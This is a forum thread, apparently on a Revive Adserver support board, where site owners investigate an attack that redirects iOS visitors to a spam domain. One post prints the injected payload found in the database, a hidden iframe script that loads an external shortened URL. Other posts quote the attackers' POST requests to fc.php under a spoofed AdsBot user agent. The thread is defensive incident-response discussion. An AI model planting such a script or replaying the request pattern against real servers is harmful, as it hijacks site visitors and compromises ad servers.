Jump to content
Snaggy

Mobile ads have been hijacked

Recommended Posts

Hi folks. We've been using Revive ads on our website for many months now, with no problems, but yesterday all of our iOS traffic was hijacked by a rogue spam script of some kind. It only occurred on iOS devices, like iPads and iPhones, not Macs. (I didn't have Android or Windows to test those out)

The page loads, but then a pop-up appears, closing it, sends you to a spam/malware site (mobile2018newmine.pw). I turned off all our campaigns but the attack still occurred. The only thing that stops it is either removing the Revise code from a page, or what I did, changing the folder name of the Revise ads, which stopped the attack from launching. This of course also stops all of our ads too, but better that, than subject our traffic to the hijack.

Any ideas as to how I can fix this? I'm thinking our SQL server was compromised? I'm not sure what else would cause this, and I want to prevent this from happening in the future. Suggestions would be appreciated. 

Thanks in advance!  

 

Share this post


Link to post
Share on other sites

On pages without the Revive code, things are normal. With it, the attack occurs. Changing the name of the Revive folder immediately stops the attack on every affected page.

I found some links on this:

How to Clean Your Hacked OpenX/Revive Adserver

and

What to do when you suspect your OpenX Source system has been hacked - Revive Support

Edited by Snaggy
spelling

Share this post


Link to post
Share on other sites

yes, I have full access to the server and MySQL database. I haven't found anything suspicious yet on the server, and haven't had time to look at the database. I'm still gathering info on what might be the issue, and what can be done.  I'm assuming the database has been compromised, especially after reading those articles.

Share this post


Link to post
Share on other sites

check the append/prepend fields in rv_banners, rv_zones ... i'm still very curious on how they got access, since as far as i know there are no vulnerabilities for this version.
if you are unable to find out, could you please let me know? maybe i can take a look with you.

Share this post


Link to post
Share on other sites

FYI i just found this thread by a user reporting virus on our site, as they on iphone/ipad get redirected to mobile2018newmine .pw as well.
I have not had time to investigate yet, but we also run Revive so I suspect this is the same as your issue. Have you made any conclusions since your post yesterday?

We are using Revive Adserver v4.1.4 and our /admin/ directory is IP restricted by Apache, so if this is a bug, it appears to be in the public-facing part of Revive.

Share this post


Link to post
Share on other sites

I just had time to investigate a bit now. As Ian suggests, code has been prepended in rv_zones. All my zones have had the following code added:

<style>#ifr_ads_banners{width:1600px;height:800px;position:absolute;left:-9985px;}</style><script>(function(d,e,g){g=d.createElement(e);g.src='//goo.gl/Cp8ciT';g.id='ifr_ads_banners';d.body.appendChild(g);})(document,'iframe');</script>

I do not know when this has happended, but given the timing of Snaggys post, the user report I received being within a couple of hours of it and no security vulnerabilities being known, I assume it is very recent.

If I search my access logs for POST requests and filter off 403/404 responses plus our own IP addresses, the only interesting POST I come up with is this:

[03/Jan/2019:20:38:48 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.0" 200 352 "https://google.com/serach?q=https://myadserverurl.com/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)"

The IP of the request belongs to an OVH server, not Google, and it is the only request I have from this IP address. Does anyone have any input?

Share this post


Link to post
Share on other sites

Please see below:

<?php

/*
+---------------------------------------------------------------------------+
| Revive Adserver                                                           |
| http://www.revive-adserver.com |
|                                                                           |
| Copyright: See the COPYRIGHT.txt file.                                    |
| License: GPLv2 or later, see the LICENSE.txt file.                        |
+---------------------------------------------------------------------------+
*/

/**
 * This is autogenerated file which contains all files from the "delivery_dev"
 * folder of Revive Adserver merged into a single output file. On systems
 * without a PHP opcode cache that is configured to not regularly check for
 * file updates, this autogenerated file can dramatically improve the
 * performance of Revive Adserver's delivery engine.
 *
 * !!!Warning!!!
 *
 * Do not edit this file. If you need to do any changes to any delivery file,
 * check out the source code from GitHub; make the necessary changes to the
 * file(s) in the "delivery_dev" folder; and regenerate the delivery files
 * using the script located in the "scripts/delivery" directory.
 */

if (empty($_GET['script'])) {
exit(1);
}
include_once '../../init-delivery.php';
$script = str_replace("\0", '', $_GET['script']);
$aPluginId = explode(':', $script);
$scriptFileName = MAX_PATH . rtrim($conf['pluginPaths']['plugins'], '/') . '/' . implode('/', $aPluginId) . '.delivery.php';
if (stristr($scriptFileName, '../') || stristr($scriptFileName, '..\\') || !is_readable($scriptFileName) || !is_file($scriptFileName)) {
if (empty($conf['debug']['production'])) {
echo "Unable to find delivery script ({$scriptFileName}) for specified plugin-component-identifier: {$script}";
}
exit(1);
}
include $scriptFileName;


The file does not appear to have been modified, since the rest of the files in my Revive installation.
I am not a PHP programmer unfortunately, but could it be some kind of missing  validation that allows a POST request to execute foreign PHP code, via the include at the end?

Share this post


Link to post
Share on other sites

The same problem here. I have access.log switched off, so I can't confirm how the injection os comming from. I have cleared all prepend code from zones table at DB, switch on logging and waiting for another injection wave. 

Share this post


Link to post
Share on other sites

CONFIRMED the point of code injection un the prepend zones are the same @sunech has previously report

[06/Jan/2019:12:22:53 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 23 "https://google.com/serach?q=https://<adserver>/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)"

Share this post


Link to post
Share on other sites

@Matteo Beccati just to confirm, are you saying my plugins/bannerTypeText/oxText/genericText.delivery.php is compromised as well?
If so, is there anywhere I can download the original file? It does not appear to be included in the stable release at the Revive website, so I assume Revive downloads the plugin somehow during the initial setup?

It seems odd that this has have been compromised though, as far as I can see the file has not been changed since August 4 when the Revive installation was set up.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...